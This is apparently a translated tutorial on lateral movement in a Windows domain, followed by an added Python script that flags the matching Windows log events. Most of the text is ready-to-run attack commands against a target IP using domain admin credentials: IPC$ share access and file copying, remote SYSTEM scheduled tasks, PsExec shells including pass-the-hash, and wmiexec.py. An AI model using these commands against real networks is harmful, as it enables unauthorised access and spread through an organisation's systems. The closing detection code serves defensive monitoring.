
How to use command-line tools for lateral movement in the intranet

2025-01-19 Update From: SLTechnology News&Howtos shulou

Shulou(Shulou.com)06/03 Report--

This article explains how to use command-line tools for lateral movement in the intranet.

Target machine: 192.168.101.157

I. IPC$ connection

IPC$ (Internet Process Connection) is a share that exposes named pipes, opened for inter-process communication. By supplying a trusted user name and password, the two ends of the connection establish a secure channel and exchange encrypted data over it, which gives access to the remote computer.

Open a command prompt and first run net use to view the connections that are already established.

Execute the following command to establish an ipc$ connection with the target (192.168.101.157 is the target IP, god is the domain name, Administrator is the user name, hongrisec@2020 is the password)

net use \\192.168.101.157 /u:god\Administrator hongrisec@2020

If it succeeds, the command reports that it completed successfully.

You can then use the dir command to list files and folders on the target. For example, the following command lists the folders under drive C

dir \\192.168.101.157\c$

List the files in the phpStudy directory under drive C

dir \\192.168.101.157\c$\phpStudy

To download a file, execute the following command, which downloads phpshao.dll and stores it in the temp folder

copy \\192.168.101.157\c$\phpStudy\phpshao.dll C:\Windows\temp

Likewise, to upload a file, execute

copy F:\test.txt \\192.168.101.157\c$

You can see that the files have been transferred.

You can also execute system commands through scheduled tasks. First execute the following command to create a scheduled task called test2

schtasks /create /s 192.168.101.157 /tn test2 /sc minute /mo 1 /tr "C:\Windows\System32\cmd.exe /c 'whoami > C:\Windows\temp\test2.txt'" /ru system /f /u god\Administrator /p hongrisec@2020

Then execute the following command to run the scheduled task immediately

schtasks /run /s 192.168.101.157 /i /tn test2 /u god\Administrator /p hongrisec@2020

After it runs successfully, use the type command to view the output of the executed command

type \\192.168.101.157\c$\Windows\temp\test2.txt

II. Psexec

You can also connect to the target through psexec, but it is noisy: a service is set up on the target machine and a large number of logs are generated.

You can download it here.

Execute the following command to get an interactive shell (192.168.101.157 is the destination IP, god is the domain, Administrator is the user name, hongrisec@2020 is the password). If a connection cannot be established, try running it as an administrator

PsExec64.exe -accepteula \\192.168.101.157 -u god\Administrator -p hongrisec@2020 -s cmd.exe

You can also connect with a hash by executing the following command

psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 god/Administrator@192.168.1.1 "whoami"

msf also has a module that connects to the target through psexec.

exploit/windows/smb/psexec

III. Wmiexec.py connection

You can download the toolkit here

You can establish a connection by directly executing the following command (god is the domain, administrator is the user name, hongrisec@2020 is the password, 192.168.101.157 is the target IP)

python wmiexec.py god/administrator:hongrisec@2020@192.168.101.157

You can also connect to the target with a hash; the command only needs a small change
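
The three techniques above each leave records on the target machine. The following is an added example, not part of the original article, that triages exported Windows events for admin-share access (5140), a scheduled task that runs a shell (4698), installation of the PSEXESVC service that Sysinternals PsExec creates by default (7045), and a shell started by WmiPrvSE.exe (4688). It assumes the matching audit policies are enabled and the events have been exported as dictionaries; the sample events and the host name TARGET-PC are constructed.

```python
import re

# Constructed sample events; field names follow the Windows Security/System log
# schemas for event IDs 5140, 4698, 7045 and 4688. Host and values are made up.
SAMPLE_EVENTS = [
    {"EventID": 5140, "Computer": "TARGET-PC", "IpAddress": "192.168.101.20",
     "SubjectUserName": "Administrator", "ShareName": r"\\*\C$"},
    {"EventID": 5140, "Computer": "TARGET-PC", "IpAddress": "192.168.101.30",
     "SubjectUserName": "alice", "ShareName": r"\\*\Public"},
    {"EventID": 4698, "Computer": "TARGET-PC", "SubjectUserName": "Administrator",
     "TaskName": r"\test2",
     "TaskContent": r"<Command>C:\Windows\System32\cmd.exe</Command>"},
    {"EventID": 7045, "Computer": "TARGET-PC", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 4688, "Computer": "TARGET-PC",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
]

ADMIN_SHARE = re.compile(r"\\(?:[A-Z]|ADMIN)\$$", re.I)  # C$, D$, ADMIN$
SHELL = re.compile(r"\\(?:cmd|powershell)\.exe", re.I)

def classify(ev):
    """Return a finding label for one event, or None if it is not of interest."""
    eid = ev.get("EventID")
    if eid == 5140 and ADMIN_SHARE.search(ev.get("ShareName", "")):
        return "admin-share-access"
    if eid == 4698 and SHELL.search(ev.get("TaskContent", "")):
        return "scheduled-task-runs-shell"
    if eid == 7045 and ev.get("ServiceName", "").upper() == "PSEXESVC":
        return "psexec-service-installed"
    if (eid == 4688
            and ev.get("ParentProcessName", "").lower().endswith("wmiprvse.exe")
            and SHELL.search(ev.get("NewProcessName", ""))):
        return "shell-spawned-by-wmi"
    return None

def triage(events):
    """Group finding labels by the host that logged them, in event order."""
    hits = {}
    for ev in events:
        label = classify(ev)
        if label:
            hits.setdefault(ev.get("Computer", "unknown"), []).append(label)
    return hits

if __name__ == "__main__":
    for host, labels in triage(SAMPLE_EVENTS).items():
        print(host, labels)
```

Several findings on one host within a short window are a stronger signal than any single one, since administrators also use admin shares and remote tasks legitimately.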
